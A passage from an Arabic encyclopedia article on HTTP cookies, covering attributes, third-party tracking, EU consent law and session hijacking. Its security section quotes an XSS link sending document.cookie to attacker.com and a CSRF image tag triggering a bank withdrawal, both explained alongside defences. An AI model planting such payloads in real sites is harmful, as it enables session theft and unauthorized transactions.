بدلاً من ذلك، يمكن استخدام سمة Max-Age لتعيين انتهاء صلاحية ملف تعريف الارتباط كفاصل زمني من الثواني في المستقبل، نسبة إلى الوقت الذي تلقى فيه المتصفح ملف تعريف الارتباط. فيما يلي مثال على ثلاثة حقول رأس Set-Cookie تم استلامها من موقع ويب بعد تسجيل دخول المستخدم:

HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly

من المقرر أن تنتهي صلاحية ملف تعريف الارتباط الأول، lu، في 15 يناير 2013. سيتم استخدامه بواسطة متصفح العميل حتى ذلك الوقت. ملف تعريف الارتباط الثاني، made_write_conn، ليس له تاريخ انتهاء صلاحية، مما يجعله ملف تعريف ارتباط جلسة. سيتم حذفه بعد أن يقوم المستخدم بإغلاق المتصفح الخاص به. تم تغيير قيمة ملف تعريف الارتباط الثالث، reg_fb_gate، إلى delete، مع وقت انتهاء صلاحية في الماضي. سيقوم المتصفح بحذف ملف تعريف الارتباط هذا على الفور لأن تاريخ انتهاء صلاحيته قد انتهى. لاحظ أنه سيتم حذف ملف تعريف الارتباط فقط إذا كانت سمات المجال والمسار في حقل Set-Cookie تتطابق مع القيم المستخدمة عند إنشاء ملف تعريف الارتباط.

اعتبارًا من 2016^[تحديث]، لم يدعم إنترنت إكسبلورر برنامج Max-Age.^[57][58]

آمن وبروتوكول نقل النص الفائق فقط

لا تحتوي السمات Secure و HttpOnly على قيم مرتبطة. بل إن وجود أسماء السمات الخاصة بهم فقط يشير إلى أنه ينبغي تمكين سلوكياتهم.

تهدف الخاصية Secure إلى إبقاء اتصال ملفات تعريف الارتباط مقتصرًا على النقل المشفر، وتوجيه المتصفحات لاستخدام ملفات تعريف الارتباط فقط عبر الاتصالات الآمنة/المشفرة. ومع ذلك، إذا قام خادم الويب بتعيين ملف تعريف ارتباط بسمة آمنة من اتصال غير آمن، فما زال من الممكن اعتراض ملف تعريف الارتباط عندما يتم إرساله إلى المستخدم من خلال هجمات الرجل في المنتصف. لذلك، للحصول على أقصى قدر من الأمان، يجب تعيين ملفات تعريف الارتباط ذات السمة Secure فقط عبر اتصال آمن.

تأمر السمة HttpOnly المتصفحات بعدم عرض ملفات تعريف الارتباط من خلال قنوات أخرى غير طلبات بروتوكول نقل النص الفائق (وبروتوكول نقل النص الفائق الآمن). وهذا يعني أن ملف تعريف الارتباط لا يمكن الوصول إليه عبر لغات البرمجة النصية من جانب العميل (خاصة جافا سكريبت)، وبالتالي لا يمكن سرقته بسهولة عبر البرمجة النصية عبر المواقع (تقنية هجوم شاملة).^[59]

إعدادات المتصفح

تدعم معظم المتصفحات الحديثة ملفات تعريف الارتباط وتسمح للمستخدم بتعطيلها. فيما يلي بعض الخيارات الشائعة:^[60]

• لتمكين أو تعطيل ملفات تعريف الارتباط بشكل كامل، بحيث يتم قبولها دائمًا أو حظرها دائمًا.
• لعرض ملفات تعريف الارتباط وحذفها بشكل انتقائي باستخدام مدير ملفات تعريف الارتباط.
• لمسح جميع البيانات الخاصة بالكامل، بما في ذلك ملفات تعريف الارتباط.

تتوفر أيضًا أدوات إضافية لإدارة أذونات ملفات تعريف الارتباط.^{[61][62][63][64]}

ملف تعريف الارتباط الخاص بطرف ثالث

طالع أيضًا: تحليل الويب

تتمتع ملفات تعريف الارتباط ببعض التأثيرات المهمة على خصوصية مستخدمي الويب وإخفاء هويتهم. على الرغم من أن ملفات تعريف الارتباط يتم إرسالها فقط إلى الخادم الذي يقوم بإعدادها أو إلى خادم في نفس نطاق الإنترنت، فقد تحتوي صفحة الويب على صور أو مكونات أخرى مخزنة على خوادم في نطاقات أخرى. تُسمى ملفات تعريف الارتباط التي يتم تعيينها أثناء استرجاع هذه المكونات بملفات تعريف الارتباط الخاصة بالجهات الخارجية. ملف تعريف الارتباط الخاص بطرف ثالث، ينتمي إلى مجال مختلف عن المجال الموضح في شريط العناوين. يظهر هذا النوع من ملفات تعريف الارتباط عادةً عندما تعرض صفحات الويب محتوى من مواقع ويب خارجية، مثل إعلانات الشعارات. يفتح هذا المجال لتتبع سجل تصفح المستخدم ويستخدمه المعلنون لتقديم إعلانات ذات صلة بكل مستخدم.

 

في هذا المثال الخيالي، قامت شركة إعلانية بوضع لافتات في موقعين على الويب. من خلال استضافة صور اللافتات على خوادمها واستخدام ملفات تعريف الارتباط الخاصة بطرف ثالث، تتمكن شركة الإعلان من تتبع تصفح المستخدمين عبر هذين الموقعين.

على سبيل المثال، لنفترض أن المستخدم يزور www.example.org. يحتوي هذا الموقع على إعلان من ad.foxytracking.com، والذي عند تنزيله، يقوم بتعيين ملف تعريف ارتباط ينتمي إلى نطاق الإعلان (ad.foxytracking.com). ثم يقوم المستخدم بزيارة موقع ويب آخر، www.foo.com، والذي يحتوي أيضًا على إعلان من ad.foxytracking.com ويقوم بتعيين ملف تعريف ارتباط ينتمي إلى هذا المجال (ad.foxytracking.com). في النهاية، سيتم إرسال كلا ملفات تعريف الارتباط هذه إلى المعلن عند تحميل إعلاناته أو زيارة موقعه الإلكتروني. يمكن للمعلن بعد ذلك استخدام ملفات تعريف الارتباط هذه لإنشاء سجل تصفح للمستخدم عبر جميع مواقع الويب التي تحتوي على إعلانات من هذا المعلن، من خلال استخدام حقل رأس حقل المرجع في ترويسة بروتوكول نقل النص الفائق.

اعتبارًا من 2014^[تحديث]، كانت بعض المواقع الإلكترونية تقوم بتعيين ملفات تعريف الارتباط لتكون قابلة للقراءة لأكثر من 100 نطاق تابع لجهة خارجية.^[65] في المتوسط، كان موقع إلكتروني واحد يقوم بتعيين 10 ملفات تعريف ارتباط، مع وصول الحد الأقصى لعدد ملفات تعريف الارتباط (التابعة للجهات الخارجية والأولي) إلى أكثر من 800.^[66]

توصي المعايير الأقدم لملفات تعريف الارتباط، آر إف سي 2109^[19] وآر إف سي 2965، بأن تحمي المتصفحات خصوصية المستخدم ولا تسمح بمشاركة ملفات تعريف الارتباط بين الخوادم بشكل افتراضي. ومع ذلك، فإن المعيار الأحدث، آر إف سي 6265، يسمح صراحةً لوكلاء المستخدم بتنفيذ سياسة ملفات تعريف الارتباط الخاصة بطرف ثالث التي يرغبون فيها. تحتوي معظم متصفحات الويب الحديثة على إعدادات خصوصية  ^{[لغات أخرى]}‏ يمكنها حظر ملفات تعريف الارتباط التابعة لجهات خارجية. منذ عام 2020، قامت سفاري،^[67] فيرفكس،^[68] وبريف^[69] بحظر جميع ملفات تعريف الارتباط التابعة لجهات خارجية بشكل افتراضي. يتيح سفاري للمواقع المضمنة استخدام واجهة برمجة تطبيقات الوصول إلى التخزين لطلب الإذن لتعيين ملفات تعريف الارتباط الخاصة بالطرف الأول. في مايو 2020، قدم جوجل كروم 83 ميزات جديدة لحظر ملفات تعريف الارتباط التابعة لجهات خارجية بشكل افتراضي في وضع التصفح المتخفي للتصفح الخاص، مما يجعل الحظر اختياريًا أثناء التصفح العادي. أضاف نفس التحديث أيضًا خيارًا لحظر ملفات تعريف الارتباط الخاصة بالطرف الأول.^[70] في أبريل 2024، أرجأ كروم حظر ملفات تعريف الارتباط التابعة لجهات خارجية بشكل افتراضي إلى عام 2025.^[71] في يوليو 2024، أعلنت جوجل عن خطة لتجنب حظر ملفات تعريف الارتباط الخاصة بالأطراف الثالثة بشكل افتراضي وبدلًا من ذلك مطالبة المستخدمين بالسماح بملفات تعريف الارتباط الخاصة بالأطراف الثالثة.^[72]

الخصوصية

تُشكّل إمكانية إنشاء ملف تعريف شخصي للمستخدمين تهديدًا للخصوصية، خاصةً عند إجراء التتبع عبر نطاقات متعددة باستخدام ملفات تعريف ارتباط تابعة لجهات خارجية. لهذا السبب، وضعت بعض الدول تشريعات بشأن ملفات تعريف الارتباط.

إن مشغلي مواقع الويب الذين لا يكشفون عن استخدام ملفات تعريف الارتباط الخاصة بأطراف ثالثة للمستهلكين يواجهون خطر الإضرار بثقة المستهلك إذا تم اكتشاف استخدام ملفات تعريف الارتباط. يؤدي الإفصاح الواضح (مثل سياسة الخصوصية) إلى القضاء على أي آثار سلبية لاكتشاف ملفات تعريف الارتباط هذه.^{[73][إخفاق التحقق]}

وضعت حكومة الولايات المتحدة قواعد صارمة بشأن إعداد ملفات تعريف الارتباط في عام 2000 بعد الكشف عن أن مكتب سياسة المخدرات في البيت الأبيض استخدم ملفات تعريف الارتباط لتتبع مستخدمي الكمبيوتر الذين يشاهدون إعلاناتها المناهضة للمخدرات عبر الإنترنت. في عام 2002، اكتشف الناشط في مجال الخصوصية دانييل براندت أن وكالة المخابرات المركزية كانت تترك ملفات تعريف ارتباط دائمة على أجهزة الكمبيوتر التي زارت موقعها على شبكة الإنترنت. عندما تم إخطارها بأنها تنتهك السياسة، ذكرت وكالة المخابرات المركزية أن ملفات تعريف الارتباط هذه لم يتم تعيينها عمدًا وتوقفت عن تعيينها. في 25 ديسمبر 2005، اكتشف براندت أن وكالة الأمن القومي كانت تترك ملفين تعريف ارتباط دائمين على أجهزة الكمبيوتر الخاصة بالزائرين بسبب ترقية البرنامج. بعد إبلاغها، قامت وكالة الأمن القومي على الفور بتعطيل ملفات تعريف الارتباط.^[74]

توجيه ملفات تعريف الارتباط الخاص بالاتحاد الأوروبي

في عام 2002، أطلق الاتحاد الأوروبي التوجيه بشأن الخصوصية والاتصالات الإلكترونية (توجيه الخصوصية الإلكترونية)، وهي سياسة تتطلب موافقة المستخدمين النهائيين على وضع ملفات تعريف الارتباط، والتقنيات المماثلة لتخزين المعلومات والوصول إليها على معدات المستخدمين.^[75][76] وعلى وجه الخصوص، تنص الفقرة 3 من المادة 5 على أنه لا يجوز تخزين البيانات غير الضرورية من الناحية الفنية على جهاز كمبيوتر المستخدم إلا إذا تم تزويد المستخدم بمعلومات حول كيفية استخدام هذه البيانات، ومنح المستخدم إمكانية رفض عملية التخزين هذه. لا يتطلب التوجيه من المستخدمين تفويض أو إخطارهم باستخدام ملفات تعريف الارتباط المطلوبة وظيفيًا لتقديم الخدمة التي طلبوها، على سبيل المثال للاحتفاظ بالإعدادات أو تخزين جلسات تسجيل الدخول أو تذكر ما هو موجود في سلة التسوق الخاصة بالمستخدم.^[77]

وفي عام 2009، تم تعديل القانون بموجب التوجيه 2009/136/إي سي، الذي تضمن تغييراً في المادة 5، الفقرة 3. بدلاً من توفير خيار للمستخدمين لاختيار عدم تخزين ملفات تعريف الارتباط، يتطلب التوجيه المنقح الحصول على موافقة لتخزين ملفات تعريف الارتباط.^[76] يتم ربط تعريف الموافقة بالتعريف الوارد في قانون حماية البيانات الأوروبي، أولاً توجيه حماية البيانات لعام 1995 ثم اللائحة العامة لحماية البيانات (GDPR). وبما أن تعريف الموافقة قد تم تعزيزه في نص اللائحة العامة لحماية البيانات، فقد كان لهذا تأثير في زيادة جودة الموافقة المطلوبة من قبل أولئك الذين يقومون بتخزين المعلومات والوصول إليها مثل ملفات تعريف الارتباط على أجهزة المستخدمين. ومع ذلك، في قضية تم الفصل فيها بموجب توجيه حماية البيانات، أكدت محكمة العدل التابعة للاتحاد الأوروبي في وقت لاحق أن القانون السابق كان يتضمن نفس الجودة القوية للموافقة مثل الصك الحالي.^[78] بالإضافة إلى متطلب الموافقة الذي ينبع من تخزين المعلومات أو الوصول إليها على جهاز المستخدم، فإن المعلومات الموجودة في العديد من ملفات تعريف الارتباط ستعتبر بيانات شخصية بموجب اللائحة العامة لحماية البيانات وحدها، وستتطلب أساسًا قانونيًا للمعالجة. لقد كان هذا هو الحال منذ توجيه حماية البيانات لعام 1995، والذي استخدم تعريفًا متطابقًا للبيانات الشخصية، على الرغم من أن اللائحة العامة لحماية البيانات في الفقرة التفسيرية 30 توضح أن معرفات ملفات تعريف الارتباط مشمولة. في حين أن معالجة البيانات بموجب اللائحة العامة لحماية البيانات لا تتطلب الموافقة، فإن خصائص الإعلان السلوكي تعني أنه من الصعب أو المستحيل تبريره تحت أي سبب آخر.^[79][80]

يجب أن تفي الموافقة بموجب الجمع بين اللائحة العامة لحماية البيانات وتوجيه الخصوصية الإلكترونية بعدد من الشروط فيما يتعلق بملفات تعريف الارتباط.^[81] يجب أن يتم تقديمها بحرية ولا لبس فيها: تم حظر المربعات المحددة مسبقًا بموجب كل من توجيه حماية البيانات لعام 1995^[78] واللائحة العامة لحماية البيانات (الفقرة 32).^[82] ينص قانون حماية البيانات العامة (GDPR) بشكل واضح على أن الموافقة يجب أن تكون «سهلة السحب مثلها مثل منحها»،^[82] وهذا يعني أن زر «رفض الكل» يجب أن يكون من السهل الوصول إليه من حيث النقرات والرؤية مثل زر «قبول الكل».^[81] يجب أن تكون محددة ومستنيرة، بمعنى أن الموافقة تتعلق بأغراض معينة لاستخدام هذه البيانات، ويجب تسمية جميع المنظمات التي تسعى إلى استخدام هذه الموافقة على وجه التحديد.^[83][84] كما قضت محكمة العدل التابعة للاتحاد الأوروبي بأن الموافقة يجب أن تكون «فعّالة وفي الوقت المناسب»، وهذا يعني أنه يجب الحصول عليها قبل وضع ملفات تعريف الارتباط وبدء معالجة البيانات بدلاً من الحصول عليها بعد ذلك.^[85]

وكانت استجابة الصناعة سلبية إلى حد كبير. ويصف روبرت بوند من شركة المحاماة «سبيتشلي بيرشام» التأثيرات بأنها «واسعة النطاق ومكلفة بشكل لا يصدق» بالنسبة «لجميع الشركات في المملكة المتحدة». يزعم سيمون ديفيس من منظمة الخصوصية الدولية أن التنفيذ السليم من شأنه أن «يدمر الصناعة بأكملها».^[86] ومع ذلك، يلاحظ العلماء أن الطبيعة المرهقة للنوافذ المنبثقة لملفات تعريف الارتباط تنبع من محاولة الاستمرار في تشغيل نموذج الأعمال من خلال الطلبات المعقدة التي قد تكون غير متوافقة مع اللائحة العامة لحماية البيانات.^[79]

وتشير الدراسات الأكاديمية والهيئات التنظيمية إلى وجود عدم امتثال واسع النطاق للقانون. أظهرت دراسة قامت بمسح 10000 موقع ويب في المملكة المتحدة أن 11.8% فقط من المواقع تلتزم بالمتطلبات القانونية الدنيا، مع توفير 33.4% فقط من المواقع التي تمت دراستها آلية لرفض ملفات تعريف الارتباط كانت سهلة الاستخدام مثل قبولها.^[81] أظهرت دراسة أجريت على 17000 موقع ويب أن 84% من المواقع انتهكت هذا المعيار، بالإضافة إلى ذلك وجدت أن العديد منها وضعت ملفات تعريف الارتباط الخاصة بأطراف ثالثة دون إشعار على الإطلاق.^[87] صرحت الجهة التنظيمية في المملكة المتحدة، مكتب مفوض المعلومات  ^{[لغات أخرى]}‏، في عام 2019 أن «إطار الشفافية والموافقة» للصناعة من مجموعة تكنولوجيا الإعلان، مكتب الإعلان التفاعلي، «غير كافٍ لضمان الشفافية والمعالجة العادلة للبيانات الشخصية المعنية، وبالتالي غير كافٍ أيضًا لتوفير الموافقة الحرة والمستنيرة، مع ما يترتب على ذلك من آثار على الامتثال للخصوصية الإلكترونية (PECR)».^[83] تسمح العديد من الشركات التي تبيع حلول الامتثال (منصات إدارة الموافقة) بتكوينها بطرق غير قانونية بشكل واضح، وهو ما لاحظه العلماء ويثير تساؤلات حول التخصيص المناسب للمسؤولية.^[88]

تم اقتراح مواصفات رابطة الشبكة العالمية تسمى بي 3 بي للخوادم لتوصيل سياسة الخصوصية الخاصة بها إلى المتصفحات، مما يسمح بالتعامل التلقائي القابل للتكوين من قبل المستخدم. ومع ذلك، فإن عددًا قليلًا من المواقع الإلكترونية تنفذ المواصفات، وقد أوقفت رابطة الشبكة العالمية العمل على المواصفات.^[89]

يمكن حظر ملفات تعريف الارتباط الخاصة بجهات خارجية بواسطة معظم المتصفحات لزيادة الخصوصية وتقليل التتبع بواسطة شركات الإعلان والتتبع دون التأثير سلبًا على تجربة الويب للمستخدم على جميع المواقع. تستخدم بعض المواقع «جدران ملفات تعريف الارتباط»، والتي تجعل الوصول إلى الموقع مشروطًا بالسماح بملفات تعريف الارتباط إما من الناحية الفنية في المتصفح، أو من خلال الضغط على «قبول»، أو كليهما.^[90] في عام 2020، أعلن مجلس حماية البيانات الأوروبي، الذي يتألف من جميع الجهات التنظيمية لحماية البيانات في الاتحاد الأوروبي، أن جدران ملفات تعريف الارتباط غير قانونية.

من أجل منح الموافقة بحرية، لا ينبغي أن يكون الوصول إلى الخدمات والوظائف مشروطًا بموافقة المستخدم على تخزين المعلومات، أو الوصول إلى المعلومات المخزنة بالفعل، في الجهاز الطرفي للمستخدم (ما يسمى بجدران ملفات تعريف الارتباط).^[91]

لدى العديد من مشغلي الإعلانات خيار إلغاء الاشتراك في الإعلانات السلوكية، مع وجود ملف تعريف ارتباط عام في المتصفح يوقف الإعلانات السلوكية.^[92][93] ومع ذلك، فإن هذا غالبًا ما يكون غير فعال ضد العديد من أشكال التتبع، مثل التتبع من الطرف الأول الذي يتزايد شعبيته لتجنب تأثير المتصفحات التي تحظر ملفات تعريف الارتباط الخاصة بالأطراف الثالثة.^[94][95] وعلاوة على ذلك، إذا كان مثل هذا الإعداد أكثر صعوبة في وضعه من قبول التتبع، فإنه يظل خرقًا لشروط توجيه الخصوصية الإلكترونية.^[81]

سرقة ملفات تعريف الارتباط واختطاف الجلسة

تستخدم معظم مواقع الويب ملفات تعريف الارتباط كمعرفات وحيدة لجلسات المستخدمين، نظرًا لوجود قيود وثغرات أمنية في الطرق الأخرى لتحديد مستخدمي الويب. إذا استخدم موقع ويب ملفات تعريف الارتباط كمعرفات للجلسات، يمكن للمهاجمين انتحال هوية طلبات المستخدمين بسرقة مجموعة كاملة من ملفات تعريف ارتباط الضحايا. من وجهة نظر خادم الويب، يمتلك طلب المهاجم نفس مصادقة طلبات الضحية؛ وبالتالي، يُنفذ الطلب نيابةً عن جلسة الضحية.

مذكورة هنا سيناريوهات مختلفة لسرقة ملفات تعريف الارتباط واختطاف جلسة المستخدم (حتى بدون سرقة ملفات تعريف ارتباط المستخدم) والتي تعمل مع مواقع الويب التي تعتمد فقط على ملفات تعريف الارتباط بروتوكول نقل النص الفائق لتحديد هوية المستخدم.

التنصت على الشبكة

 

يمكن سرقة ملف تعريف الارتباط بواسطة جهاز كمبيوتر آخر يُسمح له بالقراءة من الشبكة.

يمكن اعتراض حركة المرور على الشبكة وقراءتها بواسطة أجهزة كمبيوتر على الشبكة بخلاف المرسل والمستقبل (خاصة عبر شبكة واي فاي المفتوحة غير المشفرة). يتضمن هذا المرور ملفات تعريف الارتباط المرسلة عبر جلسات بروتوكول نقل النص الفائق غير المشفرة العادية. عندما لا يتم تشفير حركة المرور على الشبكة، يمكن للمهاجمين قراءة اتصالات المستخدمين الآخرين على الشبكة، بما في ذلك ملفات تعريف الارتباط بروتوكول نقل النص الفائق بالإضافة إلى المحتوى الكامل للمحادثات، لغرض شن هجوم الرجل في المنتصف.

يمكن للمهاجم استخدام ملفات تعريف الارتباط التي تم اعتراضها لانتحال شخصية المستخدم وإجراء مهمة ضارة، مثل تحويل الأموال من الحساب المصرفي للضحية.

يمكن حل هذه المشكلة عن طريق تأمين الاتصال بين جهاز الكمبيوتر الخاص بالمستخدم والخادم باستخدام بروتوكول طبقة النقل الآمن (بروتوكول نقل النص الفائق الآمن) لتشفير الاتصال. يمكن للخادم تحديد علامة Secure أثناء تعيين ملف تعريف الارتباط، مما سيؤدي إلى قيام المتصفح بإرسال ملف تعريف الارتباط فقط عبر قناة مشفرة، مثل اتصال تي إل إس.^[47]

نشر نطاق فرعي زائف: تسميم ذاكرة التخزين المؤقت لنظام أسماء النطاقات

إذا تمكن المهاجم من جعل خادم الأسماء يخزن خادم الأسماء مزيفًا (يُسمى تسميم ذاكرة التخزين المؤقت لخادم الأسماء)، فقد يسمح هذا للمهاجم بالوصول إلى ملفات تعريف الارتباط الخاصة بالمستخدم. على سبيل المثال، يمكن للمهاجم استخدام تسميم ذاكرة التخزين المؤقت لنظام أسماء النطاقات لإنشاء إدخال DNS مزيف لـ f12345.www.example.com والذي يشير إلى عنوان بروتوكول الإنترنت الخاص بخادم المهاجم. يمكن للمهاجم بعد ذلك نشر عنوان محدد موقع الموارد الموحد للصورة من خادمه الخاص (على سبيل المثال، http://f12345.www.example.com/img_4_cookie.jpg). سيقوم الضحايا الذين يقرؤون رسالة المهاجم بتنزيل هذه الصورة من f12345.www.example.com. نظرًا لأن f12345.www.example.com هو نطاق فرعي لـ www.example.com، فإن متصفحات الضحايا سترسل جميع ملفات تعريف الارتباط المرتبطة بـexample.com إلى خادم المهاجم.

إذا تمكن المهاجم من تحقيق ذلك، فعادةً ما يكون ذلك خطأ مزودي خدمة الإنترنت لعدم تأمين خوادم DNS الخاصة بهم بشكل صحيح. ومع ذلك، يمكن تخفيف شدة هذا الهجوم إذا كان موقع الويب المستهدف يستخدم ملفات تعريف الارتباط الآمنة. في هذه الحالة، سيواجه المهاجم تحديًا إضافيًا^[96] يتمثل في الحصول على شهادة تي إل إس الخاصة بموقع الويب المستهدف من جهة إصدار الشهادات، نظرًا لأن ملفات تعريف الارتباط الآمنة لا يمكن نقلها إلا عبر اتصال مشفر. بدون شهادة تي إل إس مطابقة، ستعرض متصفحات الضحايا رسالة تحذيرية حول شهادة المهاجم غير الصالحة، وهو ما من شأنه أن يساعد في ردع المستخدمين عن زيارة موقع الويب الاحتيالي للمهاجم وإرسال ملفات تعريف الارتباط الخاصة بهم إلى المهاجم.

برمجة المواقع المتقاطعة: سرقة ملفات تعريف الارتباط

المقالة الرئيسة: برمجة عابرة للمواقع

يمكن أيضًا سرقة ملفات تعريف الارتباط باستخدام تقنية تسمى البرمجة النصية عبر المواقع. يحدث هذا عندما يستغل المهاجم موقع ويب يسمح لمستخدميه بنشر محتوى لغة تأشير النص الترابطي وجافا سكريبت غير مفلتر. من خلال نشر أكواد لغة تأشير النص الترابطي وجافا سكريبت ضارة، يمكن للمهاجم أن يتسبب في قيام متصفح الويب الخاص بالضحية بإرسال ملفات تعريف الارتباط الخاصة بالضحية إلى موقع ويب يتحكم فيه المهاجم.

على سبيل المثال، قد يقوم المهاجم بنشر رسالة على www.example.com بالرابط التالي:

<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>

 

برمجة نصية عبر المواقع: ملف تعريف الارتباط الذي يجب أن يتم تبادله فقط بين الخادم والعميل يتم إرساله إلى طرف آخر.

عندما يقوم مستخدم آخر بالنقر فوق هذا الرابط، يقوم المتصفح بتنفيذ جزء التعليمات البرمجية داخل سمة onclick، وبالتالي استبدال السلسلة document.cookie بقائمة ملفات تعريف الارتباط التي يمكن الوصول إليها من الصفحة الحالية. ونتيجة لذلك، يتم إرسال هذه القائمة من ملفات تعريف الارتباط إلى خادم attacker.com. إذا كان النشر الضار للمهاجم موجودًا على موقع ويب بروتوكول نقل النص الفائق https://www.example.com، فسيتم أيضًا إرسال ملفات تعريف الارتباط الآمنة إلى attacker.com في نص عادي.

تقع على عاتق مطوري الموقع مسؤولية تصفية مثل هذه الأكواد الخبيثة.

يمكن التخفيف من حدة هذه الهجمات باستخدام ملفات تعريف الارتباط بروتوكول نقل النص الفائق فقط. لن تتمكن لغات البرمجة النصية مثل جافا سكريبت من الوصول إلى هذه الملفات، وبالتالي لن يتمكن المهاجم من جمعها.

برمجة المواقع المتقاطعة: طلب الوكيل

في الإصدارات الأقدم من العديد من المتصفحات، كانت هناك ثغرات أمنية في تنفيذ واجهة برمجة التطبيقات طلب نقل المعلومات. تتيح واجهة برمجة التطبيقات هذه للصفحات تحديد خادم وكيل من شأنه الحصول على الرد، ولا يخضع خادم الوكيل هذا لسياسة الأصل نفسه. على سبيل المثال، يقرأ الضحية منشورًا للمهاجم على www.example.com، ويتم تنفيذ البرنامج النصي للمهاجم في متصفح الضحية. يقوم البرنامج النصي بإنشاء طلب إلى www.example.com باستخدام خادم الوكيل attacker.com. نظرًا لأن الطلب يتعلق بـwww.example.com، فسيتم إرسال جميع ملفات تعريف الارتباط example.com مع الطلب، ولكن سيتم توجيهها عبر خادم الوكيل الخاص بالمهاجم. وبالتالي، سيكون المهاجم قادرًا على حصاد ملفات تعريف الارتباط الخاصة بالضحية.

لن ينجح هذا الهجوم مع ملفات تعريف الارتباط الآمنة، نظرًا لأنه لا يمكن نقلها إلا عبر اتصالات بروتوكول نقل النص الفائق الآمن، وبروتوكول نقل النص الفائق الآمن يفرض تشفيرًا من البداية إلى النهاية (أي أن المعلومات مشفرة على متصفح المستخدم وفك تشفيرها على الخادم الوجهة). في هذه الحالة، لن يرى خادم الوكيل سوى البايتات الخام المشفرة لطلب بروتوكول نقل النص الفائق.

تزوير طلب عبر الموقع

المقالة الرئيسة: تزوير الطلب عبر المواقع

على سبيل المثال، قد يتصفح بوب منتدى دردشة حيث نشر مستخدم آخر، مالوري، رسالة. لنفترض أن مالوري صممت عنصر صورة لغة تأشير النص الترابطي يشير إلى إجراء على موقع بوب الإلكتروني (بدلاً من ملف صورة)، على سبيل المثال،

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

إذا احتفظ بنك بوب بمعلومات المصادقة الخاصة به في ملف تعريف الارتباط، وإذا لم تنته صلاحية ملف تعريف الارتباط، فإن محاولة متصفح بوب لتحميل الصورة ستؤدي إلى إرسال نموذج السحب مع ملف تعريف الارتباط الخاص به، وبالتالي تفويض معاملة دون موافقة بوب.

اختطاف الكوكيز

اختطاف الكوكيز هو هجوم ضد متصفح إنترنت إكسبلورر والذي يسمح للمهاجم بسرقة ملفات تعريف الارتباط الخاصة بجلسة المستخدم عن طريق خداع المستخدم لسحب كائن عبر الشاشة.^[97] اعتبرت شركة مايكروسوفت أن هذا الخلل منخفض المخاطر بسبب «مستوى التفاعل المطلوب من المستخدم»،^[98] وضرورة أن يكون المستخدم قد سجل الدخول بالفعل إلى موقع الويب الذي تمت سرقة ملف تعريف الارتباط الخاص به.^[97] وعلى الرغم من ذلك، حاول أحد الباحثين الهجوم على 150 من أصدقائهم على الفيسبوك وحصل على ملفات تعريف الارتباط الخاصة بـ80 منهم عبر الهندسة الاجتماعية.^[97]

عيوب ملفات تعريف الارتباط

بالإضافة إلى مخاوف الخصوصية، فإن ملفات تعريف الارتباط لها أيضًا بعض العيوب الفنية. على وجه الخصوص، فإنها لا تحدد هوية المستخدمين دائمًا بدقة، ويمكن استخدامها في هجمات أمنية، وغالبًا ما تكون على خلاف مع نمط الهندسة المعمارية للبرمجيات

نقل الحالة التمثيلية (رست).^[99][100]

تحديد غير دقيق

إذا تم استخدام أكثر من متصفح على جهاز كمبيوتر واحد، فعادةً ما يكون لكل متصفح مساحة تخزين منفصلة لملفات تعريف الارتباط. وبالتالي، لا تُعرّف ملفات تعريف الارتباط هوية الشخص، بل هي مزيج من حساب المستخدم وجهاز الكمبيوتر ومتصفح الويب. وبالتالي، فإن أي شخص يستخدم حسابات أو أجهزة كمبيوتر أو متصفحات متعددة لديه مجموعات متعددة من ملفات تعريف الارتباط.^[101]

وبالمثل، لا تفرق ملفات تعريف الارتباط بين المستخدمين المتعددين الذين يتشاركون نفس حساب المستخدم والكمبيوتر والمتصفح.

بدائل لملفات تعريف الارتباط

يمكن أيضًا تنفيذ بعض العمليات التي يمكن إجراؤها باستخدام ملفات تعريف الارتباط باستخدام آليات أخرى.

المصادقة وإدارة الجلسة

رموز الويب جيسون

رمز ويب جيسون  ^{[لغات أخرى]}‏ (JWT) عبارة عن حزمة مستقلة من المعلومات يمكن استخدامها لتخزين هوية المستخدم ومعلومات صحته. وهذا يسمح باستخدامها بدلاً من ملفات تعريف الارتباط الخاصة بالجلسة. على عكس ملفات تعريف الارتباط، والتي يتم إرفاقها تلقائيًا بكل طلب بروتوكول نقل النص الفائق بواسطة المتصفح، يجب إرفاق JWTs صراحةً بكل طلب بروتوكول نقل النص الفائق بواسطة تطبيق الويب.

مصادقة بروتوكول نقل النص الفائق

يتضمن بروتوكول نقل النص الفائق بروتوكولات مصادقة الوصول الأساسية  ^{[لغات أخرى]}‏ وبروتوكولات مصادقة الوصول الملخص  ^{[لغات أخرى]}‏، والتي تسمح بالوصول إلى صفحة الويب فقط عندما يقدم المستخدم اسم المستخدم وكلمة المرور الصحيحين. إذا كان الخادم يتطلب مثل هذه بيانات الاعتماد لمنح الوصول إلى صفحة ويب، يطلب المتصفح هذه البيانات من المستخدم، وبمجرد الحصول عليها، يقوم المتصفح بتخزينها وإرسالها في كل طلب صفحة لاحق. يمكن استخدام هذه المعلومات لتتبع المستخدم.

عنوان محدد موقع الموارد الموحد (سلسلة الاستعلام)

جزء سلسلة الاستعلام من محدد موقع الموارد الموحد هو الجزء الذي يتم استخدامه عادةً لهذا الغرض، ولكن يمكن استخدام أجزاء أخرى أيضًا. تستخدم كل من آليات جلسة Java Servlet وPHP هذه الطريقة إذا لم يتم تمكين ملفات تعريف الارتباط.

تتكون هذه الطريقة من قيام خادم الويب بإضافة سلاسل استعلام تحتوي على مُعرّف جلسة فريد إلى جميع الروابط داخل صفحة الويب. عندما يتبع المستخدم رابطًا، يُرسل المتصفح سلسلة الاستعلام إلى الخادم، مما يسمح له بتحديد هوية المستخدم والحفاظ على الحالة.

